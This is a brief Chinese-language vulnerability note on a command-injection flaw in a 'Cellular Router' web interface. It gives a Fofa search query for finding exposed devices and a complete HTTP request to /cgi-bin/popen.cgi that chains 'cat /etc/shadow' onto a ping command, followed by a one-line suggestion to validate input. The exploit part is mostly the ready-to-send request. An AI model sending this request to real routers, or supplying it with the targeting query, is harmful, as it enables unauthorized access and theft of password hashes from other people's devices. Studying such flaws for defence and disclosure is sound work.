0x01 漏洞描述:
移动路由器(Cellular Router)是一种利用移动网络提供无线互联网连接的设备。它们类似于传统路由器,但不同于使用有线连接(如以太网或DSL),它们利用移动数据网络来建立互联网连接。Cellular Router存在命令执行漏洞,攻击者通过在受攻击系统上执行恶意命令,从而获取未授权的系统访问权限。
0x02 搜索语句:
Fofa:title="index" && header="lighttpd/1.4.30"
0x03 漏洞复现:
GET /cgi-bin/popen.cgi?command=ping%20-c%204%201.1.1.1;cat%20/etc/shadow&v=0.1303033443137912 HTTP/1.1
Host: your-ip
User-Agent:Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/534.57.2(KHTML, like Gecko)Version/5.1.7Safari/534.57.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length:322
0x04 修复建议:
对用户输入进行验证和过滤,确保只允许合法的输入字符和格式。